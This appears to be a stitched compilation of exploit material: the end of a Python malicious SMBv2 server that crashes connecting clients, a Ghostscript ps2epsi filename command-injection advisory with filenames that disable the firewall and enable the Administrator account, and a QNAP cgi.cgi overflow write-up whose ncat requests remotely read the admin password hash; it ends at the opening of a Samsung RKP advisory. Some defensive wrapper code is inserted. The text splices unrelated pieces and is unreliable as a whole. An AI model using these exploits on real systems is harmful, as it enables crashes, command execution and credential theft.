self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length))
else:
self.fields["Tag2ASNIdLenOfLen"] = "\x81"
self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length))
self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
###### Workstation Offset
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### Target Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMB2SessionAcceptData(Packet):
fields = OrderedDict([
("Len", "\x09\x00"),
("SessionFlag", "\x01\x00"),
("SecBlobOffSet", "\x48\x00"),
("SecBlobLen", "\x1d\x00"),
("SecBlobTag0", "\xa1"),
("SecBlobTag0Len", "\x1b"),
("NegTokenResp", "\x30"),
("NegTokenRespLen", "\x19"),
("NegTokenRespTag0", "\xa0"),
("NegTokenRespTag0Len", "\x03"),
("NegStateResp", "\x0a"),
("NegTokenRespLen1", "\x01"),
("NegTokenRespStr", "\x00"),
("SecBlobTag3", "\xa3"),
("SecBlobTag3Len", "\x12"),
("SecBlobOctetHeader", "\x04"),
("SecBlobOctetLen", "\x10"),
("MechlistMICVersion", ""),# No verification on the client side...
("MechlistCheckSum", ""),
("MechlistSeqNumber", ""),
("Data", ""),
])
def calculate(self):
###### SecBlobLen Calc:
CalculateSecBlob = str(self.fields["SecBlobTag0"])+str(self.fields["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
CalculateASN = str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
MechLen = str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
#Packet Struct len
self.fields["SecBlobLen"] = struct.pack("<h",len(CalculateSecBlob))
self.fields["SecBlobTag0Len"] = struct.pack("<B",len(CalculateASN))
self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN)-2)
self.fields["SecBlobTag3Len"] = struct.pack("<B",len(MechLen))
self.fields["SecBlobOctetLen"] = struct.pack("<B",len(MechLen)-2)
class SMB2TreeData(Packet):
fields = OrderedDict([
("Len", "\x10\x00"),
("ShareType", "\x02\x00"),
("ShareFlags", "\x30\x00\x00\x00"),
("ShareCapabilities", "\x00\x00\x00\x00"),
("AccessMask", "\xff\x01\x1f\x01"),
("Data", ""),
])
##########################################################################
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(1)
print "From:", self.client_address
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00" and data[4:5] == "\xff":
head = SMBv2Header(CreditCharge="\x00\x00",Credits="\x01\x00",PID="\x00\x00\x00\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Negotiating SMBv2."
self.request.send(buffer1)
data = self.request.recv(1024)
if data[16:18] == "\x00\x00":
CreditsRequested = data[18:20]
if CreditsRequested == "\x00\x00":
CreditsRequested = "\x01\x00"
CreditCharged = data[10:12]
head = SMBv2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
t = SMB2NegoAns(Dialect="\x02\x02")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Negotiate Protocol SMBv2 packet sent."
self.request.send(buffer1)
data = self.request.recv(1024)
#Session More Work to Do
if data[16:18] == "\x01\x00":
head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID="\x4d\x00\x00\x00\x00\x04\x00\x00",NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Session challenge SMBv2 packet sent."
self.request.send(buffer1)
data = self.request.recv(1024)
#Session Positive
if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02":
head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
t = SMB2SessionAcceptData()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Tree Connect
if data[16:18] == "\x03\x00":
head = SMBv2Header(Cmd="\x03\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", TID="\x01\x00\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
t = SMB2TreeData(Data="C"*1500)#//BUG
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Triggering Bug; Tree Connect SMBv2 packet sent."
self.request.send(buffer1)
data = self.request.recv(1024)
except Exception:
print "Disconnected from", self.client_address
pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB2)
launch.serve_forever()
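The SMB2Session1Data class above hand-patches every ASN.1 length and every NTLM offset after building the CHALLENGE_MESSAGE as one flat string. The following Python 3 example, added here and not part of the original script, builds the same SPNEGO NegTokenResp / NTLMSSP type 2 blob from structured fields instead: DER lengths are emitted in minimal form (short form below 128, 0x81 / 0x82 long forms above), TargetName and TargetInfo offsets are derived from the fixed 56-byte header, and a parser reads the blob back through those offsets to confirm they are right. The server name, domain, challenge and timestamp in sample_challenge() are constructed sample values.

```python
import struct
from datetime import datetime, timezone

NTLMSSP_CHALLENGE = 2
NEG_FLAGS = 0xE2898215                                # flag word the script hard-codes (15 82 89 e2, little-endian)
OID_NTLMSSP = bytes.fromhex("2b06010401823702020a")   # 1.3.6.1.4.1.311.2.2.10

def der_len(n: int) -> bytes:
    """Minimal DER length: short form below 128, else 0x80|k followed by k big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + der_len(len(value)) + value

def nt_time(dt: datetime) -> bytes:
    """Windows FILETIME: 100 ns intervals since 1601-01-01 UTC, little-endian 64-bit."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return struct.pack("<Q", int((dt - epoch).total_seconds() * 10_000_000))

def av_pairs(pairs, timestamp: bytes) -> bytes:
    """TargetInfo: (AvId, AvLen, UTF-16LE value) entries, MsvAvTimestamp, then MsvAvEOL."""
    out = b""
    for av_id, text in pairs:
        v = text.encode("utf-16le")
        out += struct.pack("<HH", av_id, len(v)) + v
    out += struct.pack("<HH", 7, 8) + timestamp
    return out + struct.pack("<HH", 0, 0)

def ntlm_challenge(target_name: str, pairs, challenge: bytes, timestamp: bytes) -> bytes:
    """NTLMSSP CHALLENGE_MESSAGE: 56-byte header, then TargetName and TargetInfo payloads."""
    tname = target_name.encode("utf-16le")
    tinfo = av_pairs(pairs, timestamp)
    version = bytes([6, 3]) + struct.pack("<H", 9600) + b"\x00\x00\x00\x0f"   # constructed version field
    header_len = 56                                   # Signature..TargetInfoFields + Version
    tname_off = header_len
    tinfo_off = tname_off + len(tname)
    msg = b"NTLMSSP\x00" + struct.pack("<I", NTLMSSP_CHALLENGE)
    msg += struct.pack("<HHI", len(tname), len(tname), tname_off)        # TargetNameFields
    msg += struct.pack("<I", NEG_FLAGS) + challenge + b"\x00" * 8          # flags, ServerChallenge, Reserved
    msg += struct.pack("<HHI", len(tinfo), len(tinfo), tinfo_off) + version
    assert len(msg) == header_len
    return msg + tname + tinfo

def spnego_challenge(ntlm_blob: bytes) -> bytes:
    """NegTokenResp [1] SEQUENCE { negState [0] accept-incomplete, supportedMech [1] OID, responseToken [2] OCTET STRING }."""
    seq = tlv(0xA0, tlv(0x0A, b"\x01")) + tlv(0xA1, tlv(0x06, OID_NTLMSSP)) + tlv(0xA2, tlv(0x04, ntlm_blob))
    return tlv(0xA1, tlv(0x30, seq))

def parse_challenge(msg: bytes):
    """Follow the offsets back out of the header; returns (TargetName, {AvId: raw value})."""
    assert msg[:8] == b"NTLMSSP\x00" and struct.unpack_from("<I", msg, 8)[0] == NTLMSSP_CHALLENGE
    nlen, _, noff = struct.unpack_from("<HHI", msg, 12)
    ilen, _, ioff = struct.unpack_from("<HHI", msg, 40)
    name = msg[noff:noff + nlen].decode("utf-16le")
    info, pos = {}, ioff
    while True:
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        pos += 4
        if av_id == 0:
            break
        info[av_id] = msg[pos:pos + av_len]
        pos += av_len
    assert pos == ioff + ilen, "TargetInfoLen disagrees with the AV_PAIR list"
    return name, info

def sample_challenge():
    """Constructed example (same names the script uses as defaults); returns (spnego_token, ntlm_blob, timestamp)."""
    ts = nt_time(datetime(2017, 2, 4, tzinfo=timezone.utc))
    pairs = [(2, "SMB5"), (1, "WIN-PRH502RQAFV"), (4, "SMB5.local"),
             (3, "WIN-PRH502RQAFV.SMB5.local"), (5, "SMB5.local")]
    blob = ntlm_challenge("SMB5", pairs, bytes.fromhex("822132145146e283"), ts)
    return spnego_challenge(blob), blob, ts

if __name__ == "__main__":
    token, blob, _ = sample_challenge()
    print(len(token), token[:7].hex(), parse_challenge(blob)[0])
```

With these sample values the token comes out at 262 bytes with the outer lengths a1 82 01 02 / 30 81 ff / a2 81 e9 / 04 81 e6, which is exactly what the script's hard-coded defaults carry; the difference is that here the values are derived rather than fixed up afterwards.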
[+]#################################################################################################
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
[+]################################################################################################
Vendor:
===============
ghostscript.com
Product:
================
Ghostscript 9.20
gs920w32.exe
Windows (32 bit)
hash: fee2cc1b8b467888a4ed44dd9f4567ed
Ghostscript is a suite of software based Postscript and PDF
interpreter/renderers for file conversion.
Vulnerability Type:
==========================
Filename Command Execution
CVE Reference:
==============
N/A
Security Issue:
================
The Ghostscript ps2epsi translator, used to process ".ps" files, executes
arbitrary commands from specially crafted filenames: OS commands that are
part of the processed PostScript file's name are run. This behaviour
seems to affect only the ps2epsi translator.
Other tested GS translator calls, like 'ps2pdf', do not trigger it.
c:\>ps2epsi
"Usage: ps2epsi <infile.ps> <outfile.epi>"
For example, given a file named "POC&<SYSTEM-COMMAND>;1.ps", ps2epsi will run the
arbitrary command that follows the ampersand character "&".
If a user runs an automated script that calls the ps2epsi translator to
process ".ps" files from a remote share or directory
where the actual filenames are unknown, this can allow attackers to
execute arbitrary commands on the victim's machine.
Characters like "/" and ":" are not allowed in Windows filenames, but Windows
netsh and wmic can be abused to bypass some of these barriers.
Quick Ghostscript command-line test.
Create a file called Test&calc.exe;1.ps
ps2epsi "Test&calc.exe;1.ps" outfile
BOOM! calc.exe runs...
Exploit/POC:
=============
Add the Ghostscript lib directory 'c:\Program Files (x86)\gs\gs9.20\lib' to the Windows
environment Path, so the 'ps2epsi' GS command can be called directly.
Create the following malicious ".ps" PostScript files.
1) Turn off the Windows Firewall
Test&netsh Advfirewall set allprofiles state off&;1.ps
2) Enable Windows Administrator account (using WMIC).
Test&wmic useraccount where name='administrator' set disabled='false'&;1.ps
If wmic is not on the user's Path, fix it for the POC by setting the system
environment variable:
add "C:\Windows\system32\wbem;" to the 'Path' variable.
Run the bat script below to process a batch of "*.ps" files.
"POC.bat"
@echo off
rem ghostscript Filename Command Execution POC
rem by hyp3rlinx
for %%1 in ("*.ps") do; ps2epsi "%%1" "evil.ps"
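The batch loop above is exactly the pattern the advisory warns about: whatever the share calls the file ends up on ps2epsi.bat's command line. The following Python 3 wrapper, added here as an example and not part of the advisory, is the check a practitioner would put in front of such a loop. It rejects bare filenames that contain cmd.exe metacharacters, and it processes each file through a copy with a hash-derived name, so the original name never reaches the shell at all. The regex, the "ps2epsi.bat" command name, and the work-directory layout are assumptions; ps2epsi is not run in the offline checks.

```python
import hashlib
import re
import shutil
import subprocess
from pathlib import Path

# cmd.exe metacharacters that let a name such as "Test&calc.exe;1.ps" inject a
# command once it is substituted into a batch file's command line (assumed set).
CMD_META = re.compile(r'[&|<>^%!;"()]')
PS2EPSI = "ps2epsi.bat"          # assumption: GS lib directory is on Path (Windows batch wrapper)

def is_safe_ps_name(name: str) -> bool:
    """True when the bare filename ends in .ps and carries no cmd.exe metacharacter."""
    return name.lower().endswith(".ps") and CMD_META.search(name) is None

def sanitized_name(name: str) -> str:
    """Stable, metacharacter-free name: first 16 hex digits of SHA-256 over the original name."""
    return hashlib.sha256(name.encode("utf-8")).hexdigest()[:16] + ".ps"

def split_by_safety(names):
    """Partition a directory listing into (safe, rejected) before any batch processing starts."""
    safe, rejected = [], []
    for n in names:
        (safe if is_safe_ps_name(n) else rejected).append(n)
    return safe, rejected

def convert_via_copy(src: Path, workdir: Path, out_name: str = "out.epi") -> int:
    """Copy src to a sanitized name inside workdir and run ps2epsi on the copy.

    A .bat target is still launched through cmd.exe even with the list form of
    subprocess, so the copy, not the argument quoting, is what keeps a hostile
    name out of the command line. Returns ps2epsi's exit status."""
    workdir.mkdir(parents=True, exist_ok=True)
    clean = workdir / sanitized_name(src.name)
    shutil.copyfile(src, clean)
    return subprocess.run([PS2EPSI, str(clean), str(workdir / out_name)], check=False).returncode

def process_directory(share: Path, workdir: Path):
    """Audit a share first, then convert only the copies; returns (converted, rejected)."""
    names = sorted(p.name for p in share.glob("*.ps"))
    safe, rejected = split_by_safety(names)
    converted = [(n, convert_via_copy(share / n, workdir)) for n in safe]
    return converted, rejected
```

Logging the rejected list is worth more than silently skipping it: a share that suddenly contains names like the netsh or wmic examples above is an indicator in its own right.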
Severity:
=========
Medium
Disclosure Timeline:
===============================
Vendor Notification: No replies
February 2, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
Device Model: QNAP VioStor NVR, QNAP NAS, Fujitsu Celvin NAS (May be additional re-branded)
Attack Vector: Remote
Attack Models:
1. Classic Heap Overflows
2. Classic Stack Overflow
3. Heap Feng Shui Overflow
4. "Heack Combo" (Heap / Stack Combination) Overflow
[Timeline]
07/01/2017:
QNAP contacted me after my post to Bugtraq on 31/12/2016 (http://seclists.org/bugtraq/2017/Jan/5).
I provided additional details, and never heard anything back from QNAP.
(The patched FW versions I found out by myself; no feedback from QNAP.)
29/01/2017:
Sent this document to QNAP <security@qnap.com>, asked for feedback and also whether they have any objections before publishing.
31/01/2017:
No reply.
- Frankly speaking - ignorance; the next batch will be Full Disclosure without any prior notice to, or reply from, QNAP (oOoo).
[Vulnerable]
QNAP VioStor NVR: QVR 5.1.x (Patched?)
QNAP NAS: QTS 4.3.2 Beta (Patched?)
QNAP NAS: QTS older than 4.2.3 (build 20170121)
Fujitsu Celvin NAS: older than 4.2.3 (build 20170110)
[Not Vulnerable]
QNAP NAS: QTS >= 4.2.3 (build 20170121)
Fujitsu Celvin NAS: >= 4.2.3 (build 20170110)
[Vendor security alert]
https://www.qnap.com/en/support/con_show.php?cid=108
[Vendor URL]
https://www.qnap.com/
http://www.qnapsecurity.com/
http://www.fujitsu.com/fts/products/computing/peripheral/accessories/storage/
Note: All hardcoded examples below were made with a TS-251+ running QTS 4.2.2 (Build 20161214)
===[ 1. Classic Heap Overflows ]===
1. Both the "u" (user) and "p" (password) tags suffer from a heap overflow, which on its own allows us to overwrite the wilderness (top chunk) size.
2. The "pp" (sysApp) tag suffers from a stack overflow, which on its own allows us to overwrite libc_argv[0].
Note: Shown locally below, but it can of course be triggered remotely as well
/* Heap #1 to overwrite the heap wilderness top chunk size */
# export QUERY_STRING="u=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff"
# ./cgi.cgi
*** glibc detected *** ./cgi.cgi: double free or corruption (out): 0x0806b0d0 ***
/* Heap #2 to overwrite the heap wilderness top chunk size */
# export QUERY_STRING="u=admin&p=`for((i=0;i<260;i++));do echo -en "A";done`%ff%ff%ff%ff"
# ./cgi.cgi
*** glibc detected *** ./cgi.cgi: double free or corruption (out): 0x0806b2a0 ***
===[ 2. Classic Stack Overflow ]===
/* Stack Overflow to overwrite libc_argv[0] address pointer for reading shadow password */
# export QUERY_STRING="u=admin&pp=`for((i=0;i<4468;i++));do echo -en "A";done`%7e%c7%06%08"
# ./cgi.cgi
Content-type: text/xml
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<authPassed><![CDATA[0]]></authPassed></QDocRoot>
*** stack smashing detected ***: $1$$CoERg7ynjYLsj2j4glJ34. terminated
Aborted
As we can see above, the GLIBC heap/stack protections work quite well on their own; pretty much nothing interesting can be achieved this way.
But when we start combining vulnerabilities, flaws and nearby functions with each other, things start to get a bit more interesting.
===[ 3. Heap Feng Shui with Heap #1 and #2 Overflow ]===
/* Heap overflow with freed junk chunks, to overwrite next heap chunk header */
One of the first functions that runs in the CGI is CGI_Get_Input(); this function takes all our input to the CGI and allocates memory on the heap for later use by CGI_Find_Parameter(). This allows us to create junk memory chunks more or less wherever we would like to have them, have them freed, and then later have them allocated for our own use.
The for() loop with the character "B" creates used and freed space before "p" on the heap via CGI_Get_Input().
The upcoming calloc() for "u" will reuse this space, and the content of "u" will be copied here and overflow into the heap chunk header of "p".
[The abort() happens in <fgetpwent+402>: the malloc() from the Get_Exact_NAS_User_Name() call, and not in the calloc() for "p"]
/* Controlling: eax, edx, esi */
# export QUERY_STRING="u=`for((i=0;i<80;i++));do echo -en "A";done`%fc%ff%ff%ff%fc%ff%ff%ffCCCC%6c%b1%06%08&QNAP=`for((i=0;i<32;i++));do echo -en "B";done`&p=PPPP"
# ./cgi.cgi
*** glibc detected *** /home/httpd/cgi-bin/cgi.cgi: corrupted double-linked list: 0x0806b154 ***
Below I will demonstrate another interesting combination found while exploring,
which can easily be exploited remotely without credentials and without any prior knowledge of the remote target.
===[ 4. "Heack Combo" (Heap / Stack Combination) Overflow ]===
/* Combined heap overflow #2 with base64 decoded stack overwrite, to remotely calculate and retrieve shadowed admin (root) password */
Here we combine the "GLIBC detected" abort message in GNU libc, triggered by the heap overflow, with a base64-encoded request string to cgi.cgi on QNAP devices: the internal b64_Decode() function is called right after the heap overflow and overwrites the stack slot holding the address pointer libc_argv[0] with an address we choose, which lets us read a string from almost anywhere.
In this PoC we use the address of the admin (root) /etc/shadow password hash loaded on the heap, and read that string remotely; it is printed in place of the program name.
The critical part is to correctly align the request with the address pointer libc_argv[0]; below you will find guidance for doing so.
Notes:
1. Sending 0x00-0xff to the stack works just fine, since the request for "p" is base64 decoded. (Theoretically, we could rewrite the stack however we would like to have it.)
2. I'm using HTTPS/SSL to have some privacy while fuzzing, and only to show some people that HTTPS/SSL does not make them secure by default. (HTTP works too, of course.)
3. Right before and after the address pointer libc_argv[0], we get (harmless?) segfaults in strlen() / getenv() due to reads from invalid addresses.
4. The "\nHost: Q" is needed with HTTPS/SSL; it could be removed when using HTTP, otherwise the PoC sometimes may not work as expected. *sigh*
5. Since the pattern for reading is static, an automated tool is quite easy to develop (with slight adjustment of the offset for reading correctly).
6. Fingerprinting is extremely easy with the request "GET /cgi-bin/authLogin.cgi HTTP/1.0" (it provides an XML list with all relevant details).
7. This PoC will not work on devices that have ASLR enabled for the heap. *doh*
Credits:
QNAP, for the combination of a heap overflow with a base64-decoded stack overwrite, letting us write where we want to read.
GLIBC, for giving us quite vital information to calculate with, which allows us to aim our read correctly and then read what we want.
Now to the demonstration.
[==== (1) ====]
[Four and more bytes off below the address pointer for libc_argv[0]]
/*
You should start with a fairly low number in the for() loop (around 2000 - 3000 should be fine) and work your way up to the breaking point between #1 and #2.
Note:
In the example we start with 4464 in the for() loop, only to clearly show the breaking point between #1 and #2.
*/
Example:
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4464;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:40:06 GMT
*** glibc detected *** cgi.cgi: free(): invalid next size (normal): 0x0806e508 ***
[==== (2) ====]
[Three or two bytes off below the address pointer for libc_argv[0]]
/*
Note the "*** glibc detected ***" line below: it no longer prints the program name as in #1 above. This is the very important first step to look for.
Note:
Two bytes off can sporadically generate a segfault, so don't be fooled into believing you are in #3.
I recommend first finding the exact breaking point between #1 and #2 (program name).
*/
Example (three off below):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4465;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:41:12 GMT
*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
Example (two off below):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4466;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:41:52 GMT
*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
[==== (3) ====]
[One byte off below the address pointer for libc_argv[0]]
/*
Very important step: segfault in strlen(); we now need to add one more byte to correctly overwrite the address pointer libc_argv[0]
*/
Example (one off below):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4467;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:42:26 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain
[==== (4) ====]
/*
The address we are looking for can be calculated from the heap address in the message in #2 (0x0806e508) by subtracting the offset below.
Fixed offset (more or less)
NASX86: 0x16b2
NASARM: 0x1562
NASX86 example:
If we subtract the offset: 0x0806e508 - 0x16b2 = 0x0806ce56, we should directly read the hash. (If not, adjust the read slightly via the offset.)
*/
Example (correctly aligned):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QNAP=$(for((i=0;i<4468;i++));do echo -en "\xff";done) ; PWNED=$"\x56\xce\x06\x08"; echo -en "$QNAP$PWNED" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:43:08 GMT
*** glibc detected *** $1$$CoERg7ynjYLsj2j4glJ34.: free(): invalid next size (normal): 0x0806e510 ***
[==== (5) ====]
/*
If we add one or more bytes above the address pointer for libc_argv[0], either a "400 Bad Request" is generated or a "200 OK" with no output, as in #3.
If you don’t get the expected results (or no results at all), you are most probably here.
*/
[One byte off or more above the address pointer for libc_argv[0]]
Example (one or more off above):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4469;i++));do echo -en "\xff";done) ; AP=$"\x56\xce\x06\x08"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 400 Bad Request
Date: Sun, 08 Jan 2017 11:45:01 GMT
Server: http server 1.0
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=982
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
